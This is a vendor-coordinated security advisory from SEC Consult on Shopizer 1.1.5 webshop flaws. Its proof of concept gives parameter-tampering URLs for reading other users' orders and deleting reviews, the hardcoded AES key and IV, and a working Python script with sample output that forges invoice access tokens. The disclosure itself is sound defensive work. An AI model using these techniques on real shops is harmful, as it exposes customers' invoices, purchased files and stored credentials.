Multiple high risk vulnerabilities in Shopizer webshop

SEC Consult Vulnerability Lab Security Advisory < 20140710-1 >

=======================================================================

title: Multiple high risk vulnerabilities in Shopizer webshop

product: Shopizer

vulnerable version: 1.1.5 and below

fixed version: v2 (new codebase)

impact: high

homepage: www.shopizer.com

found: 2012-09-04

by: K. Gudinavicius

SEC Consult Vulnerability Lab

www.sec-consult.com

=======================================================================

 

Vendor description:

-------------------

Shopizer is an open source java shopping cart and e-commerce content

management software (CMS). The system is built on Struts 2, Hibernate and

Spring. JQuery ui and ajax are heavily used on the ui as well as DWR and

Struts2-jQuery plug-in. (http://www.shopizer.com/)

 

 

 

Vulnerability overview/description:

-----------------------------------

Shopizer is prone to the following high risk vulnerabilities:

 

1) Authentication/authorization bypass

 

The authentication and authorization mechanism provided by the web application

is prone to an authentication/authorization bypass vulnerability, which can be

easily exploited by remote attackers for gaining access to private

information. Malicious actions can be performed by directly calling internal

methods which are supposed to be accessed only by authenticated and permitted

users.

 

 

2) Hardcoded default encryption key

 

A default encryption key is used across all versions of the Shopizer. It can't

be changed, for example, by editing a configuration file, because it's

hardcoded in the source code of the web application. The default encryption

key can be used to encrypt special values allowing access to the sensitive

information.

 

 

 

Proof of concept:

-----------------

1) Authentication/authorization bypass

 

The viewFiles method is vulnerable to authentication bypass. By changing the

value of the orderId parameter (e.g. by incrementing it) it is possible to

access and download ordered files of other users. This means that a malicious

user can completely bypass the checkout process and even he doesn't need an

account in order to gain access to the data that is sold on the target

website. In the following example files of the order with the ID 61 will be

accessed.

 

/shop/checkout/viewFiles.action?orderId=61

 

The removeReview method is vulnerable to authorization bypass. An

authenticated user can remove arbitrary product reviews by changing the value

of the reviewId parameter (e.g. by incrementing it). The following URL will

remove the product review with the ID 398.

 

/shop/profile/removeReview.action?reviewId=398

 

 

2) Hardcoded default encryption key

 

The hardcoded default encryption key is 1000000000000000

(SecurityConstants.java) and the default initialization vector is

fedcba9876543210 (EncryptionUtil.java). Both values were extracted from the

publicly available versions of the Shopizer. The following is the source code

of a Python script that can be used to decrypt and encrypt arbitrary values by

using the extracted keys.

 

from Crypto.Cipher import AES
from binascii import unhexlify
import sys

mode = AES.MODE_CBC
size = AES.block_size

pad = lambda s: s + (size - len(s) % size) * chr(size - len(s) % size)

def decrypt(ciphertext):
    ciphertext=unhexlify(ciphertext)
    decryptor = AES.new('1000000000000000', mode,'fedcba9876543210')
    plain = decryptor.decrypt(ciphertext)
    print repr(plain)
    
def encrypt(plaintext):
    sample=pad(plaintext)
    encryptor = AES.new('1000000000000000', mode,'fedcba9876543210')
    plain = encryptor.encrypt(sample)
    print plain.encode('hex')

if __name__=='__main__':
    if len(sys.argv)<3:
        print "Usage: %s encrypt|decrypt text" % sys.argv[0]
        sys.exit(1)
    elif sys.argv[1]=='decrypt':
        decrypt(sys.argv[2])
    elif sys.argv[1]=='encrypt':
        encrypt(sys.argv[2])

 

The tool can be used to gain access to the invoices of other users. The

prepareSimpleInvoice action takes encrypted value of the order number that is

incremental. For example, to gain access to the invoice of the 57 order the

57|0 string must be encrypted:

 

C:\>python aes.py encrypt "57|0"

0664567580f32d3398a981cf51285057

 

The encrypted string is then used as a value for the fileId parameter of the

following URL:

 

/shop/cart/prepareSimpleInvoice.action?fileId=0664567580f32d3398a981cf51285057

 

Other parts of the web application such as passwords and ordered files also

depend on the same encryption keys. If an attacker is able to gain access to

the database where encrypted user credentials are stored, he can easily

decrypt and use them in the further attacks.

 

 

 

Vulnerable / tested versions:

-----------------------------

The vulnerabilities have been verified to exist in version 1.1.5 of Shopizer,

which is the most recent version at the time of discovery.

 

 

 

Vendor contact timeline:

------------------------

2012-09-04: The vulnerabilities have been found during a short blackbox test

of a shopizer installation during a customer project

2012-12-20: Customer allows contacting vendor

2013-01-10: Contacting vendor through support@shopizer.com, fast reply,

sending advisory

2013-01-22: Asking for status update, reply: vendor takes a look

2013-02-26: Asking for status update, vendor has some questions regarding

version numbers

2013-03-22: Asking for status update again

2013-03-23: Vendor: Release 2 is scheduled for June

2013-06-25: Asking for status update, no answer

2013-07-01: Sending deadline for advisory release

2013-07-07: Vendor: Version 2 of shopizer delayed

2013-07-08: Asking for new release date

2013-07-09: Vendor: moving from Struts to Spring & Spring security

2013-10-03: Asking again for release date

2013-10-06: Vendor: Release shortly

2013-12-10: Asking for update

2013-12-12: Vendor: Release date set for January 2014

2014-06: Vendor releases v2

2014-07-10: SEC Consult releases security advisory

 

 

 

Solution:

---------

Using the old version branch 1.x is not recommended as there are no security

fixes implemented by the vendor.

 

Version 2 of the software has not been tested by SEC Consult and it is unclear

whether the issues have been solved.

 

 

Workaround:

-----------

-

 

 

Advisory URL:

-------------

www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm

 

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

 

SEC Consult

Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius

 

Headquarter:

Mooslackengasse 17, 1190 Vienna, Austria

Phone: +43 1 8903043 0

Fax: +43 1 8903043 15

 

Mail: research at sec-consult dot com

Web: www.sec-consult.com

Blog: blog.sec-consult.com

Twitter: twitter.com/sec_consult

 

EOF K. Gudinavicius / @2012, 2013, 2014